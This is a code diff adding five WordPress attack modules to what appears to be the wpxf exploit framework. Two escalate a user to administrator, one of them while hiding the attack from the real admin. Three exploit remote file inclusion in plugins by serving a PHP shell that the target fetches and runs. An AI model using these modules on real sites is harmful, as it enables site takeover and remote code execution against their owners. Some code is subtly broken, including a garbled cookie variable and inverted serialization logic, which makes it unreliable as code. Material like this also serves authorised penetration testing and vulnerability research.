wpxf 2.0.0a

data/lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb

@@ -0,0 +1,92 @@
+# frozen_string_literal: true
+
+class Wpxf::Auxiliary::WpFrontEndProfilePrivilegeEscalation < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WP Front End Profile <= 0.2.1 Privilege Escalation',
+      desc: %(
+        The WP Front End Profile plugin, in versions <= 0.2.1, allows authenticated
+        users of any user level to escalate their user role to an administrator.
+      ),
+      author: [
+        'rastating' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8620']
+      ],
+      date: 'Sep 15 2016'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'profile_form_path',
+        desc: 'The path to the page containing the profile editor form',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-front-end', '0.2.2')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def profile_form_url
+    normalize_uri(full_uri, datastore['profile_form_path'])
+  end
+
+  def fetch_profile_form
+    res = nil
+
+    scoped_option_change('follow_http_redirection', true) do
+      res = execute_get_request(url: profile_form_url, cookie: session_cookie)
+    end
+
+    res
+  end
+
+  def form_fields_with_default_values
+    res = fetch_profile_form
+    return nil unless res && res.code == 200
+
+    fields = {}
+    res.body.scan(/<input.+?name="(.+?)".+?value="(.*?)".*?>/i) do |match|
+      if match[0].start_with?('wpfep_nonce_name', '_wp_http_referer', 'profile[')
+        emit_info "Found field #{match[0]}", true
+        fields[match[0]] = match[1]
+      end
+    end
+
+    fields
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Requesting profile editor form...'
+    form_fields = form_fields_with_default_values
+
+    if form_fields.nil?
+      emit_error 'Failed to retrieve the profile form'
+      return false
+    end
+
+    form_fields['profile[wp_user_level]'] = 10
+    form_fields['profile[wp_capabilities][administrator]'] = 1
+    form_fields['profile[wpfep_save]'] = 'Update Profile'
+
+    emit_info 'Elevating privileges...'
+    execute_post_request(
+      url: profile_form_url,
+      cookie: cosession_cookieokie,
+      body: form_fields
+    )
+  end
+end

data/lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb

@@ -0,0 +1,117 @@
+# frozen_string_literal: true
+
+require 'base64'
+
+class Wpxf::Auxiliary::WplmsPrivilegeEscalation < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpClient
+  include Wpxf::WordPress::Login
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WPLMS Theme Privilege Escalation',
+      desc: %(
+        The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows
+        an authenticated user of any user level to set any system option
+        due to a lack of validation in the import_data function of
+        /includes/func.php.
+
+        The module first changes the admin e-mail address to prevent any
+        notifications being sent to the actual administrator during the
+        attack, re-enables user registration in case it has been
+        disabled and sets the default role to be administrator.
+        This will allow for the user to create a new account with admin
+        privileges via the default registration page found at
+        /wp-login.php?action=register.
+      ),
+      desc_preformatted: true,
+      author: [
+        'Evex',     # Vulnerability discovery
+        'rastating' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7785']
+      ],
+      date: 'Feb 09 2015'
+    )
+  end
+
+  def check
+    check_theme_version_from_readme('wplms', '1.8.4.2', '1.5.2')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def php_serialize(value)
+    # Only strings and numbers are required by this module
+    case value
+    when String, Symbol
+      "s:#{value.bytesize}:\"#{value}\";"
+    when Integer
+      "i:#{value};"
+    end
+  end
+
+  def serialize_and_encode(value)
+    serialized_value = php_serialize(value)
+    return nil unless serialized_value.nil?
+
+    Base64.strict_encode64(serialized_value)
+  end
+
+  def set_wp_option(name, value)
+    encoded_value = serialize_and_encode(value)
+    if encoded_value.nil?
+      emit_error "Failed to serialize #{value}", true
+      return nil
+    end
+
+    res = execute_post_request(
+      url: wordpress_url_admin_ajax,
+      params: { 'action' => 'import_data' },
+      body: { 'name' => name, 'code' => encoded_value },
+      cookie: session_cookie
+    )
+
+    if res.nil?
+      emit_error 'No response from the target', true
+    elsif res.code != 200
+      emit_warning "Server responded with code #{res.code}", true
+    end
+
+    res
+  end
+
+  def run
+    return false unless super
+
+    new_email = "#{Utility::Text.rand_alpha(5)}@#{Utility::Text.rand_alpha(5)}.com"
+    emit_info "Changing admin e-mail address to #{new_email}..."
+    if set_wp_option('admin_email', new_email).nil?
+      emit_error 'Failed to change the admin e-mail address'
+      return false
+    end
+
+    emit_info 'Enabling user registrations...'
+    if set_wp_option('users_can_register', 1).nil?
+      emit_error 'Failed to enable user registrations'
+      return false
+    end
+
+    emit_info 'Setting the default user role...'
+    if set_wp_option('default_role', 'administrator').nil?
+      emit_error 'Failed to set the default user role'
+      return false
+    end
+
+    register_url = normalize_uri(full_uri, 'wp-login.php?action=register')
+    emit_success 'Privilege escalation complete'
+    emit_success "Create a new account at #{register_url} to gain admin access."
+
+    true
+  end
+end

data/lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb

@@ -0,0 +1,98 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::AdvancedCustomFieldsRemoteFileInclusion < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpServer
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Advanced Custom Fields Remote File Inclusion',
+      desc: 'The Advanced Custom Fields plugin, in versions 3.5.1 and below, '\
+            'allows for remote file inclusion and remote code execution via '\
+            'the export.php script. This exploit only works when the PHP '\
+            'option "allow_url_include" is enabled (disabled by default).',
+      author: [
+        'Charlie Eriksen <charlie[at]ceriksen.com>', # Vulnerability disclosure
+        'rastating'                                  # WPXF module
+      ],
+      references: [
+        ['URL', 'http://secunia.com/advisories/51037/'],
+        ['WPVDB', '6103']
+      ],
+      date: 'Nov 14 2012'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'rfi_host',
+        desc: 'The address of the host listening for a connection',
+        required: true
+      ),
+      StringOption.new(
+        name: 'rfi_path',
+        desc: 'The path to access via the remote file inclusion request',
+        default: Utility::Text.rand_alpha(8),
+        required: true
+      )
+    ])
+  end
+
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'advanced-custom-fields')
+  end
+
+  def check
+    check_plugin_version_from_readme('advanced-custom-fields', '3.5.2')
+  end
+
+  def rfi_host
+    normalized_option_value('rfi_host')
+  end
+
+  def rfi_path
+    normalized_option_value('rfi_path')
+  end
+
+  def rfi_url
+    "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}"
+  end
+
+  def on_http_request(path, params, headers)
+    payload.encoded
+  end
+
+  def vulnerable_url
+    normalize_uri(plugin_url, 'core', 'actions', 'export.php')
+  end
+
+  def run
+    return false unless super
+
+    start_http_server(true)
+
+    emit_info 'Executing request...'
+    res = execute_post_request(
+      url: vulnerable_url,
+      body: {
+        'acf_abspath' => rfi_url
+      }
+    )
+    stop_http_server
+
+    emit_info "Response code: #{res.code}", true
+    emit_info "Response body: #{res.body}", true
+
+    if res.code == 500 || res.body =~ /allow_url_include/
+      emit_error 'allow_url_include appears to be disabled'
+      return false
+    end
+
+    if res && res.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+
+    true
+  end
+end

data/lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb

@@ -0,0 +1,91 @@
+# frozen_string_literal: true
+
+require 'erb'
+
+class Wpxf::Exploit::FastImageAdderV11RfiShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpServer
+  include Wpxf::WordPress::ShellUpload
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Fast Image Adder <= 1.1 RFI Shell Upload',
+      desc: %(
+        Fast Image Adder <= 1.1 suffers from a remote file inclusion vulnerability
+        which allows unauthenticated users to download and execute a PHP shell
+        hosted on a remote server.
+
+        This module will host a HTTP server to serve the payload, and make a request
+        to the target that will initiate the download and execution of the payload.
+      ),
+      author: [
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8092'],
+        ['URL', 'http://www.vapid.dhs.org/advisory.php?v=139']
+      ],
+      date: 'Jul 10 2015'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'rfi_host',
+        desc: 'The address of the host listening for a connection',
+        required: true
+      ),
+      StringOption.new(
+        name: 'rfi_path',
+        desc: 'The path to access via the remote file inclusion request',
+        default: Utility::Text.rand_alpha(8),
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('fast-image-adder', '1.2')
+  end
+
+  def rfi_host
+    normalized_option_value('rfi_host')
+  end
+
+  def rfi_path
+    normalized_option_value('rfi_path')
+  end
+
+  def rfi_url
+    "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}"
+  end
+
+  def on_http_request(_path, _params, _headers)
+    payload.encoded
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'fast-image-adder', "fast-image-adder-uploader.php?confirm=url&url=#{url_encode(rfi_url)}")
+  end
+
+  def uploaded_payload_location
+    upload_result.body[/Uploaded as (.+?)\s/i, 1]
+  end
+
+  def payload_body_builder
+    Utility::BodyBuilder.new
+  end
+
+  def execute_payload(url)
+    stop_http_server
+    super(url)
+  end
+
+  def run
+    start_http_server true
+    super
+  end
+end

data/lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb

@@ -0,0 +1,94 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::FlickrPictureBackupRfiShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpServer
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Flickr Picture Backup RFI Shell Upload',
+      desc: %(
+        Flickr Picture Bacup suffers from a remote file inclusion vulnerability
+        which allows unauthenticated users to download and execute a PHP shell
+        hosted on a remote server.
+
+        This module will host a HTTP server to serve the payload, and make a request
+        to the target that will initiate the download and execution of the payload.
+      ),
+      author: [
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8803'],
+        ['URL', 'http://www.vapidlabs.com/advisory.php?v=190']
+      ],
+      date: 'Apr 26 2017'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'rfi_host',
+        desc: 'The address of the host listening for a connection',
+        required: true
+      ),
+      StringOption.new(
+        name: 'rfi_path',
+        desc: 'The path to access via the remote file inclusion request',
+        default: Utility::Text.rand_alpha(8),
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('flickr-picture-backup', '0.9')
+  end
+
+  def rfi_host
+    normalized_option_value('rfi_host')
+  end
+
+  def rfi_path
+    normalized_option_value('rfi_path')
+  end
+
+  def rfi_url
+    "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}"
+  end
+
+  def on_http_request(_path, _params, _headers)
+    payload.encoded
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'flickr-picture-backup', 'flickr-picture-download.php')
+  end
+
+  def upload_request_params
+    { 'url' => rfi_url }
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, 'flickr_backup', payload_name)
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('url', rfi_url)
+    builder
+  end
+
+  def execute_payload(url)
+    stop_http_server
+    super(url)
+  end
+
+  def run
+    start_http_server true
+    super
+  end
+end